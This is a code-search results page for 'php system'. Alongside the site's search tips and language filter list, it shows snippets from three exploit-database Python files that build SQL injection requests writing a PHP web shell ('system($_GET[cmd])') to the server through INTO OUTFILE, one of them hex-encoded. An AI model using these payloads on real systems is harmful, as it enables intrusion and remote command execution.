php%20system | searchcode

Not the results you expected?

Search Tips

If you have run a search that returned no results there are a few things to try. By default searchcode prioritizes system survival (hey its a free service!), and as such might do some load shedding, which can mean you don't see results you expect. You can do some things to help with this.

Filters

Filtering by language or source will cut down the number of results searchcode needs to look at. If you know a result for instance a term can be found in python code, specifying python re.compile lang:python via the lang:python syntax, or the sidebar filters.

This works in reverse too, if you specify a filter and are not getting what you expect, try removing the filter.

You can also filter by filename database file:content where the filename must match at the start what you supply.

Add more terms or longer terms

Adding more search terms will now only improve relevance it will reduce the number of results that searchcode needs to inspect. So rather than searching for test consider trying unittest or test random.

Keep in mind searchcode uses AND logic. This means search will look for all of the terms you enter split by whitespace. So a search for *testing.T randomstring will look for documents which contain both *testing.T and randomstring in any order in a document, with a preference to displaying snippets where the terms are close together.

Literal search

Searchcode will literal search on anything, split by whitespace. This allows you to search for i++; if you like but it does mean that no advanced search query syntax is supported (for the moment anyway) outside of filters and exact match.

Exact match search

You can search for exact matches by enclosing them in quotes "class ScopSearch(unittest.TestCase):"

Smallest term size

The smallest term you can search for in searchcode is 3 characters long. This is because it uses a trigram index to search on. So a search for two characters, such as i+ will never return a result. However i++ will. Note that while 2 character terms are not searched for if they are in a search with other longer terms it may be used for matching and displaying code snippets.

Case insensitive

Generally consider searchcode case insensitive. It actually lowercase's everything it indexes, so it won't work as expected for some unicode points. Note that highlighting is real unicode case insensitive using simple case fold rules.

25606.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 92 lines

                    
29    sqli = ('http://{0}/kimai/db_restore.php?dates%5B%5D={1}_kimai_var%20UNION'
                    
30    '%20SELECT%20\'<?php%20system($_GET["rr"]);?>\'%20FROM%20kimai_usr'
                    
31    '%20INTO%20OUTFILE%20\'{2}/{3}.php\';--%20&submit=recover')

28960.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 59 lines

                    
36    # ' UNION SELECT '<?php system($_GET['cmd']) ?>,2,3,4,5,6,7,8,9 INTO OUTFILE 'yourshell';-- -
                    
37    exploit = '1\'%20UNION%20SELECT%20\'<?php%20system($_GET[\\\'cmd\\\'])?>\',2,3,4,5,6,7,8,9%20'\
                    
38              'INTO%20OUTFILE%20\'{0}/{1}.php\';%20--%20-%20'.format(options.path,shell)

28971.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 56 lines

                    
28    # ' UNION SELECT '<?php system($_GET['cmd'])?>,2,3,[..]13 INTO OUTFILE 'yourshell';-- -
                    
29    exploit = '\'%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20\'<?php%20system($_GET[\\\'cmd\\\'])?>\''\
                    
30              ',2,3,4,5,6,7,8,9,10,11,12,13%20INTO%20OUTFILE%20\'{0}/{1}.php\';%20--%20-%20'\

Source

Language

ABAP AMPLE ASP ASP.NET ATS AWK ActionScript Ada Agda Alchemist Alex Alloy Android Interface Definition Language Ant Apex Trigger Arduino Sketch Arvo AsciiDoc AspectJ Assembly AutoHotkey Autoconf Bash Basic Batch Bazel Bitbake Bitbucket Pipeline Blade Boo Bosque Brainfuck BuildStream C C Header C Shell C# C++ C++ Header CCS CMake COBOL CSON CSS CSV CUDA Cabal Cargo Lock Cassius Certificate Ceylon Clean Clojure ClojureC ClojureScript Closure Template CloudFormation (JSON) CloudFormation (YAML) CodeQL CoffeeScript Cogent ColdFusion ColdFusion CFScript Config Coq Creole Crystal Cython D DAL DM Dart Device Tree Dhall Docker ignore Dockerfile Document Type Definition ECPP EEx ERB Elixir Elm Emacs Dev Env Emacs Lisp Erlang Expect Extensible Stylesheet Language Transformations F# F* FIDL FORTRAN Legacy FORTRAN Modern FSL FXML Fennel Fish Flow9 Forth Fortran 95 Fragment Shader File Freemarker Template Futhark GDScript GLSL GN Game Maker Language Game Maker Project Gemfile Gherkin Specification Go Go Template Gradle Grails Groovy HEX HLSL HTML Haml Hamlet Handlebars Happy Harbour Haskell Haxe Hg Ignore IDL INI Idris InstallShield Intel HEX Isabelle JAI JCL JSON JSONL JSX Jade Jam Janet Java JavaScript JavaServer Faces JavaServer Pages Jenkins Buildfile Jinja Julia Julius Jupyter Just Kermit Korn Shell Kotlin LD Script LESS LEX LOLCODE LaTeX Lean License Lisp Logtalk Lua Lucius Luna MATLAB MQL Header MQL4 MQL5 MSBuild MSBuild scripts MUMPS MXML Macromedia eXtensible Markup Language Madlang Makefile Mako Markdown Mathematica Maven Mercury Meson Modula3 Module-Definition Monkey C Mustache NAnt script NAnt scripts Nial Nim Nix OCaml Objective C Objective C++ Octave Opalang OpenCL Oracle Forms Oracle Reports Org Oz PHP PKGBUILD PL/I PL/SQL PSL Assertion Pascal Patch Patran Command Language Perl Pig Latin Plain Text Polly Pony Portable Object PowerBuilder Powershell Processing Prolog Properties File Protocol Buffers Pug Puppet PureScript Python Q# QCL QML Qt Qt Linguist Qt Project R Racket Rakefile Razor ReStructuredText ReasonML Report Definition Language Rexx Robot Framework Ruby Ruby HTML Rust SAS SKILL SPDX SQL SQL Data SQL Stored Procedure SRecode Template SVG Sass Scala Scheme Scons Shell Sieve Slim Smarty Template Softbridge Basic Solidity Specman e Spice Netlist Standard ML Stata Stylus Swift Swig SystemVerilog Systemd TCL TL TOML TTCN TaskPaper TeX Teal Teamcenter def Teamcenter met Teamcenter mth Terraform Thrift Titanium Style Sheet Twig Twig Template TypeScript TypeScript Typings Unity-Prefab Unknown Unreal Script Ur/Web Ur/Web Project V VHDL Vala Vala Header Varnish Configuration Velocity Template Language Verilog Verilog Args File Verilog-SystemVerilog Vertex Shader File Vim Script Visual Basic Visual Basic for Applications Visual Fox Pro Visualforce Component Visualforce Page Vue Web Services Description Language WiX include WiX source WiX string localization Windows Message File Windows Module Definition Windows Resource File Wolfram Wren XAML XHTML XMI XML XML Schema XQuery XSD Xcode Config Xtend YAML Yarn Zig bait bc builder diff dtrace gitignore hoon ignore liquid m4 nuspec sed text xBase xBase Header yacc zsh